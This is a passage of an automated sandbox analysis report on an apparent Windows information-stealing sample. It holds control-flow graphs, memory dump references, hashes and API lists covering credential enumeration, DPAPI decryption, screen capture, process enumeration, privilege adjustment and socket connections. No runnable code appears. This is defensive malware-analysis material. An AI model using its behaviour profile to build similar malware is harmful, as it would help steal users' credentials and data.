                                                                                                                                                                  control_flow_graph 2204 218bfbe749c-218bfbe74b0 2205 218bfbe74b2-218bfbe74be call 218bfbe40cc call 218bfbdfbec 2204->2205 2206 218bfbe74cd-218bfbe74e4 2204->2206 2215 218bfbe74c3 2205->2215 2206->2205 2208 218bfbe74e6-218bfbe74ea 2206->2208 2210 218bfbe74ec-218bfbe74f8 call 218bfbe40cc 2208->2210 2211 218bfbe74fa-218bfbe7507 2208->2211 2210->2215 2211->2210 2214 218bfbe7509 call 218bfbf16e0 2211->2214 2219 218bfbe750e-218bfbe7525 call 218bfbf07f8 2214->2219 2218 218bfbe74c5-218bfbe74cc 2215->2218 2222 218bfbe7783-218bfbe779b call 218bfbdfc3c 2219->2222 2223 218bfbe752b-218bfbe7536 call 218bfbf0828 2219->2223 2223->2222 2228 218bfbe753c-218bfbe7547 call 218bfbf0858 2223->2228 2228->2222 2231 218bfbe754d-218bfbe7564 2228->2231 2232 218bfbe75c6-218bfbe75d3 call 218bfbf0b6c 2231->2232 2233 218bfbe7566-218bfbe757f call 218bfbf0b6c 2231->2233 2232->2218 2238 218bfbe75d9-218bfbe75df 2232->2238 2233->2218 2239 218bfbe7585-218bfbe7588 2233->2239 2240 218bfbe75e1-218bfbe75eb call 218bfbf1724 2238->2240 2241 218bfbe75fe 2238->2241 2242 218bfbe758e-218bfbe7598 call 218bfbf1724 2239->2242 2243 218bfbe777c-218bfbe777e 2239->2243 2240->2241 2254 218bfbe75ed-218bfbe75fc 2240->2254 2245 218bfbe7602-218bfbe762f 2241->2245 2242->2243 2253 218bfbe759e-218bfbe75b4 call 218bfbf0b6c 2242->2253 2243->2218 2248 218bfbe7631-218bfbe7638 2245->2248 2249 218bfbe763a-218bfbe767b 2245->2249 2248->2249 2251 218bfbe7687-218bfbe76d2 2249->2251 2252 218bfbe767d-218bfbe7684 2249->2252 2256 218bfbe76d4-218bfbe76db 2251->2256 2257 218bfbe76de-218bfbe76f8 2251->2257 2252->2251 2253->2218 2261 218bfbe75ba-218bfbe75c1 2253->2261 2254->2245 2256->2257 2259 218bfbe7725 2257->2259 2260 218bfbe76fa-218bfbe7723 2257->2260 2259->2243 2262 218bfbe7727-218bfbe775c 2259->2262 2260->2243 2261->2243 2263 218bfbe775e-218bfbe7777 2262->2263 2264 218bfbe7779 2262->2264 2263->2243 2264->2243
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1405656091-0
                                                                                                                                                                  • Opcode ID: 842d06e59cb7d0c874962108e89d6781c57040cb1ba9c53ec58eb2fa30030a5a
                                                                                                                                                                  • Instruction ID: bfea9a69057f8c2acf95db582a1a0468af53b3f5e9e998c9a76dc347809f8e05
                                                                                                                                                                  • Opcode Fuzzy Hash: 842d06e59cb7d0c874962108e89d6781c57040cb1ba9c53ec58eb2fa30030a5a
                                                                                                                                                                  • Instruction Fuzzy Hash: 6081F9B27042458BEB588F38C9893EC37A5E7647CCF149525DA19CB789EF38DA518B40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2265 218bfbd8b70-218bfbd8bb5 2266 218bfbd8e81-218bfbd8ebb call 218bfbdc4d0 call 218bfbd9610 2265->2266 2267 218bfbd8bbb-218bfbd8be5 call 218bfc0f960 2265->2267 2275 218bfbd8ec0-218bfbd8ec6 2266->2275 2273 218bfbd8bf4-218bfbd8c2d call 218bfbb4f50 call 218bfbdb600 call 218bfbd9610 2267->2273 2274 218bfbd8be7-218bfbd8bf0 2267->2274 2303 218bfbd8dc4-218bfbd8dcb 2273->2303 2304 218bfbd8c33-218bfbd8cb8 call 218bfb95330 call 218bfbb50b0 call 218bfbb8950 call 218bfbb5630 2273->2304 2274->2273 2278 218bfbd9057-218bfbd905b 2275->2278 2279 218bfbd8ecc-218bfbd8f4b call 218bfb95330 call 218bfbb50b0 call 218bfbb8950 call 218bfbb5630 2275->2279 2282 218bfbd9061-218bfbd90be call 218bfb90840 call 218bfb90fb0 2278->2282 2283 218bfbd9129-218bfbd9130 2278->2283 2332 218bfbd8f51-218bfbd8f59 2279->2332 2333 218bfbd919b-218bfbd91b7 call 218bfbb4110 call 218bfbff198 2279->2333 2286 218bfbd90fd-218bfbd9128 call 218bfbfcb70 2282->2286 2312 218bfbd90c0-218bfbd90d5 2282->2312 2285 218bfbd9132-218bfbd9147 2283->2285 2283->2286 2290 218bfbd90ec-218bfbd90f8 call 218bfbfcb90 2285->2290 2291 218bfbd9149-218bfbd915c 2285->2291 2290->2286 2296 218bfbd9166-218bfbd916b call 218bfbdfc0c 2291->2296 2297 218bfbd915e 2291->2297 2320 218bfbd916c-218bfbd9188 call 218bfbb4110 call 218bfbff198 2296->2320 2297->2290 2309 218bfbd8e15-218bfbd8e18 2303->2309 2310 218bfbd8dcd-218bfbd8e13 call 218bfb90840 2303->2310 2304->2320 2361 218bfbd8cbe-218bfbd8cc6 2304->2361 2316 218bfbd8e70-218bfbd8e7c call 218bfbb4d70 2309->2316 2317 218bfbd8e1a-218bfbd8e5b call 218bfb90840 2309->2317 2328 218bfbd8e60-218bfbd8e6f call 218bfb90fb0 2310->2328 2312->2290 2319 218bfbd90d7-218bfbd90ea 2312->2319 2316->2286 2317->2328 2319->2290 2319->2296 2353 218bfbd9189-218bfbd918e call 218bfbdfc0c 2320->2353 2328->2316 2339 218bfbd8f8c-218bfbd8fd1 call 218bfbfeae0 * 2 2332->2339 2340 218bfbd8f5b-218bfbd8f6c 2332->2340 2348 218bfbd91b8-218bfbd91bd call 218bfbdfc0c 2333->2348 2365 218bfbd9005-218bfbd9018 2339->2365 2366 218bfbd8fd3-218bfbd8fe5 2339->2366 2341 218bfbd8f87 call 218bfbfcb90 2340->2341 2342 218bfbd8f6e-218bfbd8f81 2340->2342 2341->2339 2342->2341 2342->2348 2363 218bfbd91be-218bfbd91c3 call 218bfbdfc0c 2348->2363 2364 218bfbd918f-218bfbd9194 call 218bfbdfc0c 2353->2364 2367 218bfbd8cc8-218bfbd8cda 2361->2367 2368 218bfbd8cfa-218bfbd8d40 call 218bfbfeae0 * 2 2361->2368 2386 218bfbd9195-218bfbd919a call 218bfbdfc0c 2364->2386 2376 218bfbd904c-218bfbd9052 2365->2376 2377 218bfbd901a-218bfbd902c 2365->2377 2374 218bfbd8fe7-218bfbd8ffa 2366->2374 2375 218bfbd9000 call 218bfbfcb90 2366->2375 2369 218bfbd8cf5 call 218bfbfcb90 2367->2369 2370 218bfbd8cdc-218bfbd8cef 2367->2370 2394 218bfbd8d73-218bfbd8d85 2368->2394 2395 218bfbd8d42-218bfbd8d53 2368->2395 2369->2368 2370->2353 2370->2369 2374->2363 2374->2375 2375->2365 2376->2278 2383 218bfbd9047 call 218bfbfcb90 2377->2383 2384 218bfbd902e-218bfbd9041 2377->2384 2383->2376 2384->2383 2388 218bfbd9160-218bfbd9165 call 218bfbdfc0c 2384->2388 2386->2333 2388->2296 2398 218bfbd8d87-218bfbd8d99 2394->2398 2399 218bfbd8db9-218bfbd8dbf 2394->2399 2396 218bfbd8d55-218bfbd8d68 2395->2396 2397 218bfbd8d6e call 218bfbfcb90 2395->2397 2396->2364 2396->2397 2397->2394 2401 218bfbd8db4 call 218bfbfcb90 2398->2401 2402 218bfbd8d9b-218bfbd8dae 2398->2402 2399->2303 2401->2399 2402->2386 2402->2401
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy
                                                                                                                                                                  • String ID: value
                                                                                                                                                                  • API String ID: 2453523683-494360628
                                                                                                                                                                  • Opcode ID: 24e98557fd3de6d7cc014377f0c68907832d3612fd4622e4c58e467f2ed64789
                                                                                                                                                                  • Instruction ID: 1561864220f6bd3289fe9da0cbfe0d0a6c8e24235238997e7f893815ac967d7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 24e98557fd3de6d7cc014377f0c68907832d3612fd4622e4c58e467f2ed64789
                                                                                                                                                                  • Instruction Fuzzy Hash: 2202A336618BC086EB10CF74E4C83ED6761E7A57A8F505215FA9D83ADADF38C685C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                  • String ID: [PID:
                                                                                                                                                                  • API String ID: 420147892-2210602247
                                                                                                                                                                  • Opcode ID: dbeb01865e1e91274e06068612c7658427ca5b7a4fcb9feccc8b4e72984c5d65
                                                                                                                                                                  • Instruction ID: 9d6ec922ed0a5d94511d0068d1391e5177d2a82d41ee9296f3b58d8c72331484
                                                                                                                                                                  • Opcode Fuzzy Hash: dbeb01865e1e91274e06068612c7658427ca5b7a4fcb9feccc8b4e72984c5d65
                                                                                                                                                                  • Instruction Fuzzy Hash: 45E19172618BC086EB20DB25E8843DD77A5F3997A8F504215EA9D47BEADF38C784C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3038321057-0
                                                                                                                                                                  • Opcode ID: 29a02e95aae9899e0029659e102052f54fff5397b51cb33b914b83ea41570e5f
                                                                                                                                                                  • Instruction ID: b59d0e479f46a6955d55e64940415ec75dffcd5bf0142eed3239fb135fffd466
                                                                                                                                                                  • Opcode Fuzzy Hash: 29a02e95aae9899e0029659e102052f54fff5397b51cb33b914b83ea41570e5f
                                                                                                                                                                  • Instruction Fuzzy Hash: 99219432218B9086F760CF51F49879EB3A0F798B94F555125EA8D83B58DF7CCA85CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: recv$Cleanupclosesocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 146070474-0
                                                                                                                                                                  • Opcode ID: 88e6c81b1b5bace096d133c2889b81d8965be35fdd25d4db3d0ec7a32f0f09d5
                                                                                                                                                                  • Instruction ID: ad0cce9f0f37b60d243275dc4b954fb0f6d444b04d5fe3411b3f28c55a7e315c
                                                                                                                                                                  • Opcode Fuzzy Hash: 88e6c81b1b5bace096d133c2889b81d8965be35fdd25d4db3d0ec7a32f0f09d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F12927361CBC081EA21DB15E4983DF6761F7A9798F504611EAED83ADADF78CA84C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cred$EnumerateFree
                                                                                                                                                                  • String ID: cannot use push_back() with
                                                                                                                                                                  • API String ID: 3403564193-4122110429
                                                                                                                                                                  • Opcode ID: 5cdbd958dc95d9ab355d103ed4b1d14ba4d67746ba7f73ca658fdebda1d47ebe
                                                                                                                                                                  • Instruction ID: ace4b183141e492afdcf2421868bc33eeeabfe67d6d7647a27ef65ad5edacb15
                                                                                                                                                                  • Opcode Fuzzy Hash: 5cdbd958dc95d9ab355d103ed4b1d14ba4d67746ba7f73ca658fdebda1d47ebe
                                                                                                                                                                  • Instruction Fuzzy Hash: 39625C72618BC489EB208F35E8843DD77A1F79979CF508215EAAD57B9ADF38C684C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: 1.3.1.zlib-ng
                                                                                                                                                                  • API String ID: 1109970293-992988628
                                                                                                                                                                  • Opcode ID: a76c52ca1100295dce4388bd63296ac4753b9ff7154bfa9c896794fd626aff6e
                                                                                                                                                                  • Instruction ID: d5bf18664ac7a10d647b8990f03d719d61c5eb03da7cb7b45c9d06857bc8068c
                                                                                                                                                                  • Opcode Fuzzy Hash: a76c52ca1100295dce4388bd63296ac4753b9ff7154bfa9c896794fd626aff6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2881C262F15B81D9F711EB70E4402AC7375EB94788F918236EE4D17BA9EE38D192C350
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryVirtual$ProtectQuery
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1355999870-4108050209
                                                                                                                                                                  • Opcode ID: 1e8753ed2aab2ba12e738e60e9ac9591d6e3866d73b3672bb0ead951c35cddb0
                                                                                                                                                                  • Instruction ID: fe9c69fefd60f973641fa1bd3f741975f89a83711a283f1ffe1116b45a67ac5a
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e8753ed2aab2ba12e738e60e9ac9591d6e3866d73b3672bb0ead951c35cddb0
                                                                                                                                                                  • Instruction Fuzzy Hash: CB115E22A1AF81C2FA519B15F850366B3A4FB987A4F515335EAAD027B4DF3CD0958B10
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1561624719-0
                                                                                                                                                                  • Opcode ID: 534917215b691bdf8008ca3940d01222a19eb5e5d5bf9c8332b99172fc4e0cb2
                                                                                                                                                                  • Instruction ID: 9d4f7f52c3615a05796b21c72f45a32eb655fac55d1931cb4b1b1da3acebc22d
                                                                                                                                                                  • Opcode Fuzzy Hash: 534917215b691bdf8008ca3940d01222a19eb5e5d5bf9c8332b99172fc4e0cb2
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C413932618B90CAE3208F74D4943DD37A4F76974CF445629EA8856E8ADF79C6A4C344
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DriveLogicalStrings
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2022863570-0
                                                                                                                                                                  • Opcode ID: 05563d9c9f8d9765ab942f76f343afa8ceddb3167ad04ffcdfa04968ca2d4d44
                                                                                                                                                                  • Instruction ID: 2d38ccde4be5d28f9a81410c9191fb7c5663dcc2e7e0b2af8b6fc319b2279d54
                                                                                                                                                                  • Opcode Fuzzy Hash: 05563d9c9f8d9765ab942f76f343afa8ceddb3167ad04ffcdfa04968ca2d4d44
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D416D33A18B8482E710CF25E8843DEB774F794788F549215EA8863A69DF78D6D1DB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                  • Opcode ID: 5706546f313706de72a237bf98d2ae5729b4666c4094d2ca0903643dc08702f3
                                                                                                                                                                  • Instruction ID: 1515714fb75511dab36455c830f5810651417295420b67efa9dba599a9301a67
                                                                                                                                                                  • Opcode Fuzzy Hash: 5706546f313706de72a237bf98d2ae5729b4666c4094d2ca0903643dc08702f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B01213251C78082E761CF25E8953DEB3A4F7A8788F541115EACD82659DFBCC694CB40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 699 218bfbc8b30-218bfbc8b6b call 218bfbc88b0 702 218bfbc8bac 699->702 703 218bfbc8b6d-218bfbc8b7c EnterCriticalSection 699->703 704 218bfbc8bb1-218bfbc8bcf call 218bfbfcb70 702->704 705 218bfbc8bd0-218bfbc8bea LeaveCriticalSection GdipGetImageEncodersSize 703->705 706 218bfbc8b7e-218bfbc8ba0 GdiplusStartup 703->706 705->702 708 218bfbc8bec-218bfbc8bff 705->708 706->705 709 218bfbc8ba2-218bfbc8ba6 LeaveCriticalSection 706->709 711 218bfbc8c01-218bfbc8c0a call 218bfbc8640 708->711 712 218bfbc8c3b-218bfbc8c49 call 218bfbe66e4 708->712 709->702 719 218bfbc8c0c-218bfbc8c16 711->719 720 218bfbc8c38 711->720 717 218bfbc8c50-218bfbc8c5a 712->717 718 218bfbc8c4b-218bfbc8c4e 712->718 721 218bfbc8c5e 717->721 718->721 722 218bfbc8c22-218bfbc8c36 call 218bfbfd830 719->722 723 218bfbc8c18 719->723 720->712 724 218bfbc8c61-218bfbc8c64 721->724 722->724 723->722 726 218bfbc8c66-218bfbc8c6b 724->726 727 218bfbc8c70-218bfbc8c7e GdipGetImageEncoders 724->727 729 218bfbc8dde-218bfbc8de1 726->729 730 218bfbc8c84-218bfbc8c8d 727->730 731 218bfbc8dc9-218bfbc8dce 727->731 734 218bfbc8e04-218bfbc8e06 729->734 735 218bfbc8de3-218bfbc8de7 729->735 732 218bfbc8cbf 730->732 733 218bfbc8c8f-218bfbc8c9d 730->733 731->729 738 218bfbc8cc6-218bfbc8cd6 732->738 736 218bfbc8ca0-218bfbc8cab 733->736 734->704 737 218bfbc8df0-218bfbc8e02 call 218bfbdefd8 735->737 739 218bfbc8cad-218bfbc8cb2 736->739 740 218bfbc8cb8-218bfbc8cbd 736->740 737->734 742 218bfbc8cef-218bfbc8d0b 738->742 743 218bfbc8cd8-218bfbc8ce9 738->743 739->740 746 218bfbc8d6d-218bfbc8d71 739->746 740->732 740->736 744 218bfbc8d0d-218bfbc8d66 GdipCreateBitmapFromScan0 GdipSaveImageToStream 742->744 745 218bfbc8d78-218bfbc8db7 GdipCreateBitmapFromHBITMAP GdipSaveImageToStream 742->745 743->731 743->742 748 218bfbc8d76 744->748 749 218bfbc8d68-218bfbc8d6b 744->749 750 218bfbc8dd0-218bfbc8ddd GdipDisposeImage 745->750 751 218bfbc8db9 745->751 746->738 748->750 752 218bfbc8dbc-218bfbc8dc3 GdipDisposeImage 749->752 750->729 751->752 752->731
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Gdip$Image$CriticalSection$DisposeEncodersLeave$BitmapCreateEnterErrorFromGdiplusInitializeLastSaveScan0SizeStartupStream
                                                                                                                                                                  • String ID: &
                                                                                                                                                                  • API String ID: 1703174404-3042966939
                                                                                                                                                                  • Opcode ID: e0228fc8eea7d5b1ef60bb9784c8d30ef67e4de2cf218bbc2f582390e882f76a
                                                                                                                                                                  • Instruction ID: 4c12b693d885803a2736ea44c70404fcbcfa30789399593e5f2cd9bf8d105a9b
                                                                                                                                                                  • Opcode Fuzzy Hash: e0228fc8eea7d5b1ef60bb9784c8d30ef67e4de2cf218bbc2f582390e882f76a
                                                                                                                                                                  • Instruction Fuzzy Hash: 71918432208B50AAEB20CF21D8987DE37A4F774B9CF558615EA4997B94DF34CB99C340

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1400 218bfbc9be0-218bfbc9c37 call 218bfbcf890 1403 218bfbc9c7d-218bfbc9d61 call 218bfba24f0 call 218bfb95330 call 218bfb8eda0 call 218bfb95330 call 218bfb8eda0 call 218bfb90fb0 WSAStartup 1400->1403 1404 218bfbc9c39-218bfbc9c41 1400->1404 1418 218bfbc9e28 1403->1418 1436 218bfbc9d67-218bfbc9d8b socket 1403->1436 1405 218bfbc9c45-218bfbc9c4d 1404->1405 1407 218bfbc9c52-218bfbc9c62 1405->1407 1408 218bfbc9c4f 1405->1408 1410 218bfbc9c74-218bfbc9c7b 1407->1410 1411 218bfbc9c64-218bfbc9c6e call 218bfc0fd00 1407->1411 1408->1407 1410->1403 1410->1405 1411->1410 1411->1418 1420 218bfbc9e2a-218bfbc9e32 1418->1420 1422 218bfbc9e34-218bfbc9e45 1420->1422 1423 218bfbc9e65-218bfbc9ea9 call 218bfbfcb70 1420->1423 1425 218bfbc9e47-218bfbc9e5a 1422->1425 1426 218bfbc9e60 call 218bfbfcb90 1422->1426 1425->1426 1429 218bfbc9fcf-218bfbc9fd4 call 218bfbdfc0c 1425->1429 1426->1423 1437 218bfbc9fd5-218bfbc9fda call 218bfbdfc0c 1429->1437 1438 218bfbc9d91-218bfbc9dbe htons 1436->1438 1439 218bfbc9e22 WSACleanup 1436->1439 1441 218bfbc9dc4-218bfbc9dd4 call 218bfbd7890 1438->1441 1442 218bfbc9ecd-218bfbc9efe call 218bfbc8e10 call 218bfb8fb70 1438->1442 1439->1418 1449 218bfbc9dd6 1441->1449 1450 218bfbc9dd9-218bfbc9e06 inet_pton connect 1441->1450 1454 218bfbc9f36-218bfbc9f53 call 218bfbc8e10 1442->1454 1455 218bfbc9f00-218bfbc9f16 1442->1455 1449->1450 1452 218bfbc9e0c-218bfbc9e13 1450->1452 1453 218bfbc9eaa-218bfbc9eb4 1450->1453 1452->1441 1457 218bfbc9e15-218bfbc9e1c closesocket 1452->1457 1453->1442 1456 218bfbc9eb6-218bfbc9ebf 1453->1456 1464 218bfbc9f58-218bfbc9f7c call 218bfb8fb70 1454->1464 1458 218bfbc9f31 call 218bfbfcb90 1455->1458 1459 218bfbc9f18-218bfbc9f2b 1455->1459 1461 218bfbc9ec4-218bfbc9ecc call 218bfb915c0 1456->1461 1462 218bfbc9ec1 1456->1462 1457->1439 1458->1454 1459->1437 1459->1458 1461->1442 1462->1461 1469 218bfbc9f7e-218bfbc9f94 1464->1469 1470 218bfbc9fb8-218bfbc9fc4 1464->1470 1471 218bfbc9f96-218bfbc9fa9 1469->1471 1472 218bfbc9fab-218bfbc9fb0 call 218bfbfcb90 1469->1472 1470->1420 1471->1472 1473 218bfbc9fc9-218bfbc9fce call 218bfbdfc0c 1471->1473 1472->1470 1473->1429
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Info$CleanupStartupUserclosesocketconnecthtonsinet_ptonsocket
                                                                                                                                                                  • String ID: geo$system
                                                                                                                                                                  • API String ID: 213021568-2364779556
                                                                                                                                                                  • Opcode ID: 79a95a987e91092ceef9e9c8cc836127b308a12639411b662d18f645f51584df
                                                                                                                                                                  • Instruction ID: b16fb838fd5a6c97a7e75cb6db116c7f4b9e0c8291065ad1dee2459061fb78ef
                                                                                                                                                                  • Opcode Fuzzy Hash: 79a95a987e91092ceef9e9c8cc836127b308a12639411b662d18f645f51584df
                                                                                                                                                                  • Instruction Fuzzy Hash: DBC1AC72B09B9085FB00DF64D4D83DD37B2E7647ACF415612DA6DA7AA9DE34CA89C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
